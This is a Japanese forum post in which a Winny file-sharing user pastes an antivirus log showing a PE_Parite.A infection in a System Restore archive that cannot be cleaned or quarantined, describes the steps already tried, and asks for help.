ファイル ---         C:\_RESTORE\ARCHIVE\FS20.CAB            ウイルス駆除できませN    隔離できません
ファイル PE_Parite.A      A0884060.CPY (C\_RESTORE\ARCHIVE\FS20.CAB  ウイルス駆除できませN    隔離できません
【オンラインスキャンしたなら結果】
【Winnyのバージョン】1.14
【Winny歴、総DL量】半年。5GBぐらい。
【テンプレを読んだか】呼んでない。
【テンプレにある対策を実行したか】してない。
【症状、具体的に分かる限りすべて書く】ウイルス検索にひっかかる。なんか怖い。
【何をしたらそんなことになったのか】600KBぐらいのEXEファイルを落としていた。9KBぐらいのメガねのおっさんの画像を落としていた。
【これまでにとった措置】ウイルスバスターのサイトに逝って、ANTINNY駆除対策の実行を試みた。
レジストリエディタでRUNの値を見たが怪しいのが無かった。わかんなくなった。助言をしてください。


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch